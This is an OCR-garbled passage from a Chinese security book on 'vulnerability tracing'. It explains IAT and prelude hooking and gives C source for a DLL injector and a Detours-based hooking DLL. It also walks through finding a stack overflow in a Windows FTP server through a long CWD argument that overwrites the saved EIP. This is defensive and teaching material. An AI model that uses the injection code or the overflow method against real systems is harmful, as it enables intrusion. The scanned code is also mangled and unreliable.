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如 果 我 们 想 截获 被 导入 的 函数 ， 有 几 个 选择 。 比 如 说 ， 我 们 可 以 改变 目标 模块 的 IAT 里 的 地 
址 ， 使 它们 指向 我 们 的 挂 钧 函数 。 这 个 方法 允许 我 们 仅 监 视 感 兴趣 模块 里 的 函数 使 用 情况 。 如 果 
我 们 想 监 视 每 一 个 函数 的 使 用 ， 而 不 管 访问 它 的 模块 ， 那 可 以 在 执行 期 间 临 时 修改 函数 本 身 的 代 
码 ， 使 它 重 定向 到 别 的 地 方 。 

e 内 联 

许多 编译 器 可 以 优化 开发 者 的 程序 代码 。 例 如 strcpy、strlen 和 其 他 简单 的 运行 时 函数 ， 
相对 于 静态 链接 或 导入 来 说 , 它们 被 编译 到 例 程 里 。 在 编译 时 直接 代入 需要 的 函数 代码 到 函数 内 
部 将 显著 提升 程序 性 能 。 

下 面 示范 微软 Visual C+ 编译 器 内 联 编译 strien 函 数 。 在 这 个 例子 里 ,我们 压 入 字符 串 的 地 
址 ， 并 在 栈 上 检验 它 的 长 度 。 如 果 调 用 的 是 静态 链接 版 本 的 strlen， 在 返回 时 ， 我 们 先 调整 栈 
指针 ， 然 后 释放 提交 的 参数 ， 最 后 把 strlen 返 回 的 长 度 写 入 长 度 变 量 。 


没有 优化 : 

00401006 mov eax,dword ptr [buffer] 
00401009 push eax 

0040100A call _strlen (004010d0) 
0040100F add esp,4 

00401012 mov dword ptr [length],eax 


在 下 面 ， 我 们 有 stzlen 的 内 联 版 本 。 可 以 通过 把 编译 环境 切换 到 发 布 模式 来 生成 这 个 代码 。 
我 们 可 以 看 到 程序 并 没有 调用 strlen 函 数 ， 而 是 用 编译 器 把 strlen 的 代码 提取 出 来 直接 插 到 代 
码 里 了 。 我 们 把 EAX 寄 存 器 置 零 ， 然 后 扫描 被 EeDI 引 用 的 字符 串 来 寻找 NULL， 当 找到 NULL 时 ， 我 
们 得 到 计数 器 ， 并 把 它 保存 到 长 度 变量 里 。 


优化 后 : 

00401007 mov edi,dword ptr [buffer] 

0040100A or ecx, OF FFFFFFFh 

0040100D xor eax,eax 

0040100F repne scas byte ptr [edi] 

00401011 not ecx 

00401013 add ecx, OFFFFFFFFh 

00401016 mov dword ptr [length],ecx 

如 果 想 监视 内 联 函 数 的 使 用 ,我 们 可 以 通过 断 点 来 监视 异常 ,然后 从 上 下 文 结构 中 获取 信息 。 
也 可 以 用 这 个 方法 来 监视 分 析 器 。 

3. 函数 挂钩 


我 们 已 经 讨论 了 怎样 区 分 各 种 类 型 的 函数 ， 现 在 需要 收集 它们 的 使 用 信息 ， 使 用 的 办 法 是 
prelude 挂 钩 。 对 不 熟悉 挂 钧 的 人 ， 我 们 先 大 概 介绍 常见 的 挂 钧 技术 。 

e 导入 挂钩 . 

导入 挂钩 很 常见 。 每 个 已 加 载 的 模块 都 有 一 个 导入 表 。 当 把 模块 加 载 到 目标 进程 的 地 址 空间 
时 ,会 对 导入 表 进 行 处 理 。 对 每 一 个 从 外 部 模块 导入 的 函数 来 说 ， 它 们 在 IAT 里 都 有 对 应 的 条 目 。 
每 次 从 加 载 的 模块 调用 导入 函数 时 ， 执 行 流 将 被 重 定 向 到 IAT 里 对 应 的 条 目 。 图 20-1 中 有 两 个 不 
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同 的 模块 分 别 调用 位 于 kernel132 模 块 里 的 lstrcpynA 函 数 。 当 执行 1strcpynA 函 数 时 ,执行 流转 
到 模块 IAT 里 指定 的 地 址 。 一 旦 执行 完 Lstrcpyna 函 数 ， 我 们 将 返回 调用 1strcpyna 的 函数 。 


一 调用 lstrncpy 一 > 
Kernel32.d11 
« 、 
目标 模块 返回 


(vuln. exe) 1 | 


调用 m "n 


User32.d11 


图 20-1 脆弱 示例 程序 的 正常 执行 流 


可 以 用 想 重 定向 执行 的 代码 的 地 址 蔡 换 IAT 中 相应 的 地 址 来 钧 住 导 入 函数 。 因 为 每 个 模块 都 
有 自己 的 IAT， 因 此 需要 替换 想 监 视 模块 的 IAT 里 的 1strcpyna 的 进入 点 。 在 图 20-2 里 ， 替 换 
user32.911 模 块 和 vuln.exe 模 块 的 IAT 的 lstrcpynA 入 口 。 只 要 这 些 模 块 里 的 代码 执行 
lstrcpynA 函 数 ， 执 行 流 就 将 转 到 我 们 插入 的 IAT 的 地 址 。 

Kernel32.dll 
«€---- 返回 ------ 

^ | 
调用 1strcpynA 返回 

' Y 


N N / User32.dll 
NT 返回 


调用 lstmcpy 
~ /> 


VulnTrace.dll 











目标 模块 


(Vuln.exe) 





函数 : 


Vt lstrcpynA 





图 20-2 ”在 修改 加 载 模块 user32.dl11 的 导入 表 后 ， 脆 弱 示 例 程 序 的 执行 流 


这 个 函数 仅仅 检查 准备 提交 给 lstrcpynA 的 参数 ， 然 后 悄悄 地 把 执行 流 返回 给 执行 它 的 函 
数 。 这 个 新 地 址 是 位 于 vulnTrace.d11 内 部 的 、 进 入 函数 vt_lstrcpynA 的 进入 点 。 

€ preluded£ 44 

用 导入 挂钩 ， 我 们 可 以 修改 想 监 视 模块 的 IAT 导 入 的 函数 。 前 面 提 到 ， 当 只 想 监视 某 个 特殊 
模块 里 的 函数 的 使 用 情况 时 , 导入 挂 匆 是 有 效 的 。 但 如 果 想 监视 函数 的 使 用 , 而 不 管 从 哪 调用 它 ， 
那 我 们 可 以 直接 把 挂 钧 放 到 想 监 祝 的 函数 代码 里 。 我 们 只 需 把 jmp 指 令 插入 想 监 视 的 目标 函数 的 
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过 程 前 奏 里 即 可 。jmp 指 令 将 引用 想 重 定向 到 在 执行 的 截获 函数 之 上 的 代码 地 址 。 
这 个 方法 允许 我 们 捕获 每 一 个 想 监 袖 的 特殊 的 函数 。 在 图 20-3 里 , 我 们 可 以 看 到 两 个 模块 的 
函数 都 分 别 调用 了 位 于 kerne132 .dl11 模 块 里 的 1strcpyna 函 数 。 


一 一 调用 1strncpy 一 > Kerne132.dll 


- 调用 lstrcpynA 
调用 Vt lstrcpynA 


wo J C 
TN 


/ 


返回 


目标 模块 


(Vuln. exe) 








VulnTrace.dll 


函数 : 


Vt lstrcpynA 





图 20-3 ”在 修改 加 载 模块 kerne132.dl11 里 1strcpynR 函 数 的 prelude 之 后 ， 脆 弱 示 例 程序 的 执行 流 


当 执 行 1stzcpynRA 函 数 时 ， 执 行 流转 到 在 模块 的 IAT 里 指定 的 地 址 。 执 行 在 插入 钧 子 时 创建 
的 jmp 指 令 ， 而 不 是 执行 整个 lstrcpynA 函 数 。 当 执行 jmp 指 令 时 ， 我 们 被 重 定向 到 位 于 
vulnTrace.611 内 部 的 新 函数 vt_lstrcpynA。 这 个 冰 数 用 来 代替 原来 的 lstrcpynA 函 数 ， 它 在 
对 参数 进行 检查 后 ， 将 把 执行 流 交 给 原来 的 lstrcpynA。 

为 了 实现 这 个 方法 ， 我 们 可 以 使 用 Detours API 里 的 DetourFunctionWithTrampline 隙 数 。 
后 面 的 章节 将 介绍 怎样 用 Detours APISR £4) BE M A Bh I] prelude. 

@ prologuedé 44 

prologuet# #4 Allprelude## (RAW. ERIZ [8] E H3 S ALA, 1 Aprologuet# t, ARAA 
完成 后 、 返 回调 用 者 前 ， 我 们 将 控制 该 函数 。 这 样 允许 检查 函数 执行 的 结果 。 例 如 ， 如 果 想 查看 
使 用 中 的 网 络 函 数 接收 到 什么 数据 ， 就 需要 使 用 prologue 挂 钩 。 

4. 数据 收集 

在 确认 了 想 监 视 的 函数 并 准备 好 在 合适 的 地 方 放置 钩子 后 , 我 们 还 必须 判断 被 钧 住 的 函数 的 - 
执行 流 被 临时 重 定向 到 哪 了 。 对 VulnTrace 来 说 ， 将 钩 住 1strcpynR， 并 将 它 的 执行 流 重 定向 到 被 
明确 设计 用 来 获取 提交 给 真正 1strcpyna 的 参数 信息 的 钩子 。 一 旦 调用 者 进入 1stzcpyna， 我 们 
将 得 到 它 的 参数 信息 ， 然 后 用 微软 调试 API 交 付 这 些 参 数 信息 。 函 数 outputDebugSstring 将 把 我 
们 收集 的 数据 提交 微软 的 调试 子 系统 。 可 以 用 DebugView 监 视 提交 的 消息 ，DebugView 可 从 
http://www.microsoft.com/technet/sysinternals/default.mspx 获 得 。 

下 面 显 示 的 是 新 的 、 运 行 中 的 函数 vt_1lstrcpynA。 
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char *vt lstrcpynA (char *dest,char *source,int maxlen) 


t 
char dbgmsg[1024]; 
LPTSTR retval; 


 Snprintf(dbgmsg, sizeof(dbgmsg), 
"[VulnTrace]: lstrcpbynA(0x$08x, %s, %d)\n", 


dest, source, maxlen 
)i 
dbgmsg[sizeof(dbgmsg)-1] = 0; 


OutputDebugString (dbgmsg) ; 
retval = real lstrcpynA(dest, source, maxlen); 


return(retval); 


} 
当 脆 弱 程 序 (vuln.exe) 调用 lstrcpynA 时 ， 执 行 流 被 重 定 向 到 vt_1lstrcpynA。 在 这 个 例 
子 里 ， 我 们 用 调试 子 系统 交付 原 准备 提交 给 1strcpynA 的 参数 的 基本 信息 。 


20.1.3 编译 VulnTrace 

在 讨论 漏洞 跟踪 的 每 个 组 件 之 前 ， 为 了 编译 和 使 用 VulnTrace， 还 需要 用 到 下 列 工 具 : 

O 微软 的 Visual C++ 6.0 (或 者 别 的 Windows C / C++ 编译 器 ) 

u Detours (http://research.microsoft.com/sn/detours) 

O DebugView (http://www.microsoft.com/technet/sysinternals/default.mspx ) 

下 面 将 讨论 漏洞 跟踪 解决 方案 中 的 每 个 组 件 。 你 可 以 用 它 跟 踪 本 章 开 头 提 到 的 例子 里 的 缓冲 

1. VTinject 

这 个 程序 把 VulnTrace 注 入 我 们 想 审 计 的 目标 进程 中 ， 只 是 把 它 编译 成 一 个 可 执行 文件 
(vrInject .exe)。 记 住 ， 在 编译 时 需要 包括 Detours 头 文件 ， 并 连接 Detours 库 (detours.1ib)。 
这 就 需要 把 Detours 目 录 加 到 库 里 ， 并 把 路 径 放 入 编译 器 里 。 为 了 使 用 VTInject， 只 需 将 进程 ID 
(pID) 作为 第 一 个 也 是 唯一 一 个 参数 。 VTInject 将 把 当前 目录 下 的 VulnTrace. dl1 载 入 目标 进程 。 
要 确认 编译 好 的 vulnmrace.dl1 和 VmInject.exe 位 于 同一 目录 。 下 面 是 Vvzinject.exe 和 和 
Vulntrace. dll vice: 


DIGIC K KORR Fe Fe Ae e R de Fe Ae ACRI ORO ROI Fe UICC ICICI CI AE e Je FE e e ICICI HE e e E II ITO I I I IOI k de AKER 





VIInject.cpp 


VTInject will adjust the privilege of the current process so we can access 
processes operating as LOCALSYSTEM. Once the privileges are adjusted VTInject 
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will open a handle to the target process id (PID) and load our VulnTrace.dll 


into the process. 


NR ok kc kk kk e ok coke e k ok kk ke ok ko e ko kk ok oe kk kk k k ko ek ke RR Rh kk ke ko ke koe ke koe ke e e kk ee eee y 


#include <stdio.h> 


#include «windows.h» 


#include "detours.h" 
#define dllNAME "\\VulnTrace.dli" 


int CDECL inject_d11(DWORD nProcessId, char *szDllPath) 


{ 


HANDLE token; 
TOKEN_PRIVILEGES tkp; 
HANDLE hProc; 


if (OpenProcessToken ( GetCurrentProcess () 
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, 
&token) == FALSE) 


fprintf(stderr, "OpenProcessToken Failed: O0x%X\n", GetLastError()); 
return (-1); 
} 


if (LookupPrivilegeValue ( NULL, 
"SeDebugPrivilege", 
&tkp.Privileges[0].Luid) == FALSE) 
fprintf(stderr, "LookupPrivilegeValue failed: 0x%X\n", GetLastError()); 
return(-1); 
tkp.PrivilegeCount = 1; 
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
if (AdjustTokenPrivileges ( token, FALSE, &tkp, 0, NULL, NULL) == FALSE) 
{ 
fprintf(stderr, 
"AdjustTokenPrivileges Failed: Ox$XWn", 


GetLastError()); 


return (-1); 


CloseHandle (token); 


hProc = OpenProcess(PROCESS ALL ACCESS, FALSE, 
if (hProc == NULL) 
t 

fprintf(stderr, 


"[VTInject]: OpenProcess(%d) failed: 
nProcessId, GetLastError()); 
return(-1); 
} 
fprintf(stderr, 
"(VTInject]: Loading $s into %d.\n", 


szDllPath, nProcessId); 


fflush(stdout); 


nProcessId); 


Sa Wn", 


if (!DetourContinueProcessWithDllA(hProc, szDllPath)) 


{ 
fprintf (stderr, 


"DetourContinueProcessWithDll($s) failed: %d", 


szDllPath, GetLastError()); 


return(-1); 


return (0); 


int main(int argc, char **argv) 


{ 
char path[1024]; 
int plen; 


if(arge!= 2) 
{ 


fprintf(stderr, 


"\n-= VulnTrace =-\n\n" 
"\tUsage: %s <process_id>\n\n" 


rargv[0]); 


return (-1); 
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plen = GetCurrentDirectory(sizeof(path)-1, path); 
strncat(path, dllNAME, (sizeof(path)-plen)-1); 
if(inject dll(atoi(argv[1]), path)) 
{ 
fprintf(stderr, "Injection Failed\n"); 
return(-1); 


return(0); 
3; 


2. VulnTrace.dll 
下 面 的 库 文件 由 本 章 前 面 讨论 的 组 件 组 成 。 使 用 该 库 文件 可 以 通过 审计 程序 监视 LstrcpynR 
函数 的 使 用 。 把 它 编译 为 DLL， 用 VTInject 注 入 到 脆弱 程序 里 即 可 。 


/* 
* vVulnTrace.cpp 
*/ 


#include "stdafx.h" 
#include <windows.h> 
#include <stdio.h> 
#include "detours.h" 


DWORD get_mem_size(char *block) 
{ 
DWORD fnum-0, 

memsize-0, 
*frame ptr-NULL, 
*prev frame ptrzNULL, 
*stack_base=NULL, 
*stack_top=NULL; 


asm mov eax, dword ptr fs: [4] 
asm mov stack_base, eax 

asm mov eax, dword ptr fs:[8] 
asm mov stack_top, eax 

asm mov frame_ptr, ebp 


if( block < (char *)stack_base && block > (char *)stack_top) 
for (fnum=0; fnum<=5 ; Enum++) 
t 
if( frame ptr « (DWORD *)stack base && frame ptr > stack top) 


{ 
prev frame ptr = (DWORD *)*frame ptr; 


if( prev frame ptr < stack base && prev frame ptr > stack top) 


{ 
if(frame ptr « (DWORD *)block && (DWORD *)block « 


prev frame ptr) 


memsize = (DWORD)prev frame ptr - (DWORD)block; 
break; 


} 
else 
frame_ptr = prev_frame_ptr; 


} 


return (memsize) ; 


DETOUR_TRAMPOLINE (char * WINAPI real lstrcpynA(char *dest,char *source,int 
maxlen), lstrcpynA); 


char * WINAPI vt lstrcpynA (char *dest,char *source,int maxlen) 


t 
Char dbgmsg[1024]; 


LPTSTR retval; 
—snprintf(dbgmsg, sizeof(dbgmsg), " [VulnTrace]: E 


istrcpynA (0x%08x: [%d], %s, %d)\n",dest,get_mem_size(dest), source, maxlen) ; 
dbgmsg [sizeof (dbgmsg)-1] = 0; 


OutputDebugString (dbgmsg) ; 
retval = real, lstrcpynA(dest, source, maxlen); 


return(retval); 


BOOL APIENTRY D11Main ( HANDLE hModule, 
DWORD ul reason for call, 
LPVOID lpReserved 


if (ul reason, for call -- dll, PROCESS, ATTACH) 


t 
DetourFunctionWithTrampoline((PBYTE)real lstrcpynA, 


(PBYTE)vt lstrcpynA); 


} 
else if (ul reason for, call == dll, PROCESS, DETACH) 


{ 
OutputDebugString("[*] Unloading VulnTrace\n"); 


return TRUE; 


EE 
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把 VTInject 和 脆弱 的 程序 编译 成 可 执行 文件 , 把 VulnTrace 编 译 成 DLL, 然后 放 在 同一 目录 下 。 
完成 这 些 步骤 后 ， 执 行 脆弱 的 程序 和 DebugView。 你 可 能 只 想 查 看 有 关 VulnTrace 的 消息 ， 因 此 ， 
可 以 适当 地 配置 DebugView， 让 它 过 滤 无 关 的 消息 ， 要 做 到 这 一 点 ， 只 需 在 DubugView 里 按 下 
CtrltL 组 合 键 ， 然 后 输入 VulnTrace。 当 一 切 就 绪 时 ， 用 目标 进程 的 DD 作为 参数 来 执行 VTInject。 
在 DebugView 里 应 该 可 以 看 到 下 面 这 样 的 消息 : 

12864] [VulnTrace]l: lstrcpynA(0x0012FF68:[16], test, 32) 


[2864] [VulnTrace]: lstrcpynA(0x0012FF68:[16], test, 32) 
[2864] [VulnTrace]: lstrcpynA (Ox0012FF68: [16], test, 32) 


在 这 里 ， 我 们 可 以 看 到 传 给 lstrcpynA 的 参数 。 第 一 个 参数 是 地 址 和 目标 缓冲 区 的 大 小 ， 第 
二 个 参数 是 将 被 复制 的 源 缓冲 区 , 第 三 个 也 是 最 后 一 个 参数 是 可 能 复制 到 目标 缓冲 区 的 最 大 长 度 。 
注意 第 一 个 参数 右边 的 数字 ， 它 是 估算 出 来 的 目标 参数 的 大 小 ， 是 用 简单 的 算法 《用 帧 指针 确定 
缓冲 区 在 哪个 栈 帧 里 ， 以 及 这 个 变量 与 栈 帧 基 址 之 间 的 距离 ) 估算 出 来 的 。 如 果 我 们 提供 的 数据 
比 变 量 地 址 与 帧 指针 基 址 之 间 已 有 的 空间 更 多 ， 那 就 可 以 通过 前 面 的 帧 改写 保存 的 EBP 和 EIP。 


20.1.4 ”使 用 VulnTrace 


现在 ， 我 们 已 经 制定 了 一 个 基本 的 漏洞 跟踪 解决 方案 ， 先 看 它 是 否 真 的 有 效 。 在 这 里 ， 我 们 
准备 以 Windows 下 流行 的 fp 服务 器 为 例 。 下 面 例子 的 目录 名 已 经 被 改变 。 

安装 后 启动 这 个 服务 ， 注 入 vulnTrace.d11， 起 动 DebugVeiw， 过 滤 与 VulnTrace 无 关 的 调 
试 消息 〈 这 一 步 是 必要 的 ， 因 为 其 他 的 程序 也 会 提交 大 量 的 调试 消息 )。 

完成 准备 工作 后 ， 用 telnet 连 到 ftp 服 务 器 。 一 连 上 去 就 看 到 了 下 列 消 息 。 





注解 考虑 到 厂商 在 本 书 出 版 之 前 ,可 能 无 法 解决 这 里 发 现 的 一 些 漏洞 .因此 , 我 们 用 [deleted] 


替换 了 敏感 数据 . 
2384 VulnTrace]: lstrcpynA(0x00dc6e58:[0], Session, 256) 
2384] [VulnTrace]: lstrepyA(0x00dc9050:[0], 0) 
2384] [VulnTrace]: lstrcpynA(0x00dc90f£0:[0], 192.168.X.X, 256) 
2384] [VulnTrace]: lstrcpynA(0x0152ebc4:[1624], 192.168.X.X, 256) 
2384] [VulnTrace]: 1strcpyA(0x0152e93c:[260], ) 
[2384] [VulnTrace]: lstrepynA(0x00dc91f8:[0], 192.168.X.X, 20) 
2384] IVulnTrace]: lstrcpynA(0x00dc91f£8:[0], 192.168.X.X, 20) 
(2384 VulnTrace]: lstrepyA(0x00dc930d: [0], C:\[deleted]) 
2384 VulnTrace]: lstrepynA(0x00dc90£0: [0 [deleted], 256) 
2384] [VulnTrace]: lstrepyA(0x00dc930d: [0], C:\{deleted] ) 
2384] [VulnTrace]: lstrcpyA(0x00dd3810:[0], 27) 
2384 VulnTrace]: lstrcpyA(0x00dd3810:[0], 27) 
2384 VulnTrace]: lstrepyA(0x0152e9cc: [292], C: NV (deleted]) 
2384] [VulnTrace]: lstrcpynA(0x00dd4ee0:[0], C:\{deleted]], 256) 
2384 VulnTrace]: lstrcpynA(0xO0dd4ca0:[0], C:\[deleted]], 256) 
2384] [VulnTrace]: lstrcpyA(0x00dd4da8:[0], C:\[deleted]\]) 
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[2384] [VulnTrace]: lstrcpyA(0x0152ee20:[1048], C:\[deletedj\]) 
[2384] [VulnTrace]: lstrcpyA(0x0152daec: [4100], 220-[deleted]) 
[2384] [VulnTrace]: lstrcpyA(0x0152e8e4:[516], C: X [deleted] \) 

[2384] [VulnTrace]: lstrcpyA(0x0152a8a4:[4100], 220 [deleted]) 


如 果 仔 细 查 看 ， 可 以 看 到 IP 正 被 记录 和 分 发 。 这 很 像 事件 特征 记录 或 基于 网 络 地 址 的 非 交 互 
式 的 访问 控制 系统 。 所 有 引用 的 路 径 都 是 服务 器 的 配置 文件 ， 我 们 不 能 控制 传递 给 这 些 例 程 的 数 
据 。( 我 们 也 不 能 改变 这 些 数据 ， 尽 管 那 可 能 很 酷 。) 

接 下 来 开始 检查 授权 例 程 ， 输 入 user test。( 之 前 ， 我 们 已 经 建 了 一 个 test 账 号 。) 


[2384] [VulnTrace]: lstrcpynA(0x00dc7830:[0], test, 310) 

[2384] [VulnTrace]: lstrcpynA(0x00dd4920:[0], test, 256) 

[2384] [VulnTrace]: lstrcpynA (0x00dd4a40: [0], test, 81) 

[2384] [VulnTrace]: lstrcpynA (0x00dd4ab1: [0], C:\[deletedj\user\test, 257) 
[2384] [VulnTrace]: lstrcpynA(0xO00dd4ca0:[0], C:\ [deleted] \user\test, 256) 
[2384] [VulnTrace]: lstrcpyA(OxO0dd4da8:[0], C:\[deleted] \user\test) 
[2384] [VulnTrace]: lstrcpyA(0x0152c190:[4100]1, 331 Password required 


程序 把 包含 用 户 名 的 缓冲 区 复制 到 一 个 没有 基于 栈 的 缓冲 区 。 能 支持 堆 大 小 估算 就 更 好 了 。 
我 们 可 以 就 此 返回 ， 手 工 检查 这 些 情况 ， 但 最 好 还 是 先 看 看 是 否 能 发 现 更 有 趣 的 事情 。 现 在 ， 按 





ftp 分 发 次 序 发 送 ftp 密 码 。. 
[2384 VulnTrace]: lstrcpyA(0x00dd3810:[0], 27) 


[2384 VulnTrace]: lstrcpyA(0x00dd3810:[0], 27) 

[2384 VulnTrace]: lstrepynA(0x0152e9e8: [288], test, 256) 

[2384 VulnTracel: lstrcpyA(0x008c7830:[0], test) 

2384] [VulnTrace]: lstrcpyA(0x0152ee00:[1028], C: NX [deleted]) 

[2384] [VulnTrace]: lstrcpyA(0x0152e990:[1028], /user/test) 

2384] [VulnTrace]: lstrcpyA(0x0152e138:[1024], test) 

[2384 [VulnTrace]: lstrcpynA(0x00dd4640:[0], test, 256) 

2384] [VulnTrace]: lstrcpynA(0x00dd4760:[0], test, 81) 

[2384] [VulnTrace]: lstrcpynA(0x00dd47d1: [0], C:\[deleted] \user\test, 257) 
[2384] [VulnTrace]: lstrepyA (0x0152ee00: [1028], C:\ [deleted] \user\test) 
[2384] [VulnTrace]: lstrcpyA(0x0152e41c:[280], C:/[deleted] /user/test) 
2384] [VulnTrace]: lstrcpynA(0x00dd4ca0:[0], C:/[deleted]/user/test, 256) 
2384 [VulnTrace]: lstrepyA (0x00dd4da8: [0], C:/ [deleted] /user/test) 
2384] [VulnTrace]: lstrcpynA(0x0152cdc9:[4071], [deleted] logon successful) 
[2384] [VulnTrace]: lstrcpyA(0x0152ecc8:[256], C:\[deleted] \user\test) 
2384] [VulnTrace]: istrepyA (0x0152ee00: [1028], C:\ [deleted] ) 

2384] [VulnTrace]: lstrcpyA (0x0152ebc0: [516], C:\ [deleted] \welcome.txt) 
2384] [VulnTrace]: istrcpyA (0x0152ab80: [4100], 230 user logged in) 


至 此 , 我 们 看 到 很 多 地 方 都 有 被 破解 的 可 能 。 但 是 ,我们 能 控制 的 数据 只 是 一 个 有 效 的 用 户 
名 ， 如 果 我 们 提交 的 用 户 名 无 效 ， 就 没有 机 会 访问 这 些 例 程 了 。 在 这 里 ， 我 们 先 记 下 这 些 实例 ， 
然后 继续 测试 。 接 下 来 检查 虚拟 内 存 到 实际 内 存 的 映射 。 尝试 用 ftp 命 令 cwd eeye2003 把 当前 目 
录 改 为 eeye2003。 


[2384] [VulnTrace]: istrepyA (0x0152ea00: [2052], user/test) 
[2384] [VulnTrace]: lstrcpynA(0x0152e2d0:[1552], eeye2003, 1437) 
[2384] [VulnTrace]: lstrcpyA(0x00dc8b0c:[01], user/test/eeye2003) 
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2384] [VulnTrace]: 
[2384] [VulnTrace]: 
[2384] [VulnTrace]: 
2384] [VulnTracel: 
2384] [VulnTrace]: 
[2384 VulnTrace]: 
[2384] 

[2384 VulnTrace]: 
doesn't exist 


跟踪 漏洞 


lstrcpyA(0x0152ee00:[1028], C:\[deleted]) 
lstrcpyA(0x0152dc54:[1024], test/eeye2003) 
lstrcpynA(0x00dd4640:[0], test, 256) 

lstrcpynA (0x00dd4760:[0], test, 81) 
lstrcpynA(0x00dd47d1:[0], C:NX(deleted]NuserNtest, 257) 
lstrcpynA(0x00dd46c0:([0], eeye2003, 256) 


[VulnTrace]: lstrepyA(0x0152ee00: [1028], 
C:\[ deleted] \user\test \eeye2003) 


lstrcpyA(0x0152b8cc:[4100], 550 eeye2003: folder 


终于 有 收获 了 ， 某 些 例 程 出 现 异 常 了 。 我 们 也 知道 我 们 可 以 控制 传递 给 各 种 例 程 的 数据 ， 因 

为 eeye2003 目录 并 不 存在 。 
最 大 的 静态 缓冲 区 是 2052B， 最 小 的 是 1024B。 从 最 小 的 长 度 开始 ， 然 后 逐渐 递增 。 因 此 ， 
第 一 个 缓冲 区 是 1024B， 这 相当 于 从 帧 基 址 到 缓冲 区 的 距离 。 如 果 提交 1032， 那 应 该 可 以 改写 保 
存 的 EBP 和 EIP。 


[2384] 
[2384] 
[2384] 
[2384] 
[2384] 


[VulnTracel: 
[VulnTrace]: 


(VulnTrace]: 


{VulnTrace] : 
[VulnTrace]: 


lstrcpyA(0x0152ea00:[2052], user/test) 
lstrcepynA(0x0152e2d0:[1552], eeye2003, 1437) 
istrcpyA(0x00dc8b0c:[0], user/test/eeye2003) 
lstrcpyA(0x0152ee00:[1028], C:\[deleted]) 
lstrcpyA(0x0152ee00:[1028], C:\ 


[deleted]NXuserNVtest/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 





显示 最 后 条 消 息 后 ， VulsTracef iL lDebugViewBiEAE Mo 这 可 能 与 改写 前 面 函数 保存 在 
栈 帧 上 的 EBP 和 EIP 有 关 。 因 此 ， 启 动 调试 器 ， 并 附 上 服务 器 的 进程 ， 然 后 重复 上 述 这 些 步骤 (这 
时 没有 加 载 VulnTrace)。 太 好 了 ， 我 们 又 找到 了 一 个 可 破解 的 缓冲 区 溢出 。 


EFL 


00000000 
00DD3050 
41414141 
00463730 
00DD3050 
00130178 
41414141 
013DE060 
41414141 
00010212 


可 见 ， ， 保 存 的 Eap 和 BTz 被 改写 ， 一 个 局 部 变量 被 载 入 ECX。 攻 击 者 在 修改 文件 名 后 〈 让 它 包 
含 载荷 和 地 址 )， 他 就 能 控制 这 个 脆弱 的 ftp 服 务 器 。 

ME, 我 们 已 经 演示 了 怎样 在 软件 里 发 现 漏洞 , 但 还 能 做 点 什么 来 改进 我 们 的 漏洞 跟踪 程序 ， 
从 而 可 以 在 更 安全 的 软件 里 发 现 问题 呢 ? 到 了 介绍 更 高 级 主题 的 时 候 了 。 
20.1.5 ”高 级 的 技术 

本 节 介 绍 更 高 级 的 漏洞 跟踪 技术 ， 用 来 提高 漏洞 跟踪 技术 的 效能 。 
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1. 指纹 系统 

静态 链接 函数 没有 把 它们 的 地 址 导出 到 外 部 模块 , 因此 我 们 无 法 快速 找到 它们 。 为 了 定位 静 
态 链 接 函 数 ， 我们 需要 建立 二 进 制 码 分 析 组 件 ， 通过 特征 来 识别 脆弱 的 函数 。 我 们 选择 的 特征 系 
统 将 直接 影响 识别 想 监 视 的 函数 的 能 力 。 我 们 最 终 选 择 CRC 32 位 checksum 和 变 长 特征 系统 的 组 
合 ， 最 大 特征 长 度 为 64B。 

为 了 找 出 想 监 视 的 函数 , 第 一 遍 先 进行 简单 的 CRC checksum 扫 描 。 我 们 对 目标 函数 的 头 16B 
做 CRC checksum。 由 于 函数 的 动态 特性 ， 越 深入 函数 的 细节 ， 越 有 可 能 失败 。 先 使 用 CRC 
checksum， 我 们 可 以 提升 一 定 的 性 能 ， 因 为 对 于 数据 库 里 的 每 一 个 特征 来 说 ，CRC checksum] 
显 比 全 字 节 比较 快 得 多 。 对 于 分 析 的 每 个 函数 ， 我 们 只 对 函数 的 头 16B 执 行 CRC checksum。 因 
为 不 同 的 缓冲 区 可 能 会 产生 同一 checksum， 为 了 检验 目标 字 节 序列 就 是 我 们 正在 寻找 的 函数 ， 
使 用 直接 比较 。 如 果 我 们 的 特征 和 目的 字 节 序列 完全 匹配 ， 那 可 以 插入 钩子 ， 开 始 监视 目的 静态 
链接 函数 。 

我 们 也 应 该 注意 到 ， 在 分 析 的 代码 序列 里 ， 如 果 有 直接 内 存 引 用 ,我 们 的 特征 系统 可 能 会 
败 ， 如 果 编 译 器 在 静态 链接 函数 时 改动 函数 的 部 分 内 容 ， 我 们 也 可 能 会 失败 。 虽 然 这 些 情 形 很 少 
见 ， 但 我 们 应 该 为 意外 情况 做 好 准备 ， 因 此 ， 我 们 向 特征 系统 中 增加 了 小 模块 一 一 特殊 符号 *。 
在 比较 期 间 ，* 对 应 的 字 节 在 目标 字 节 序列 里 应 该 被 忽略 。 这 样 一 来 ， 将 允许 我 们 创建 非常 灵活 
的 特征 ， 从 而 从 整体 上 提高 特征 系统 的 可 靠 性 。 我 们 的 特征 系统 现在 看 起 来 像 下 面 这 样 : 


Checksum Signature Function Name 
BlOCCBF9 558BEC83EC208B45085689*** *558BECB83 vt example 


函数 的 头 16B 是 通过 CRC checksum 计 算得 到 的 。 如 果 发 现 某 个 函数 和 checksum 匹 配 ， 就 把 
它 和 我 们 的 特征 相 比较 ， 如 果 匹 配 ， 就 钧 住 这 个 函数 。 

2. 更 多 的 漏洞 分 类 

让 我 们 快速 看 一 下 漏洞 跟踪 涉及 的 其 他 类 错误 。 

@ 整数 溢出 

为 了 检查 异常 参数 的 大 小 ,可 以 钧 住 分 配 和 复制 内 存 的 例 程 ， 检 查 其 长 度 参 数 。 这 个 方法 可 
以 和 模糊 测试 技术 结合 起 来 ， 识 别 多 种 整数 溢出 漏洞 。 

e 格式 化 串 错误 

通过 检查 传递 给 格式 化 函数 〈 如 snprintf) 的 参数 ， 你 可 以 发 现 多 种 格式 化 串 错 误 。 

@ 其 他 的 分 类 

目录 遍历 、SQL 注 入 、XSS 和 其 他 的 漏 润 ， 可 以 道 过 监视 它们 处 理 数据 的 函数 来 检测 这 些 漏 
洞 。 
20.2 小 结 

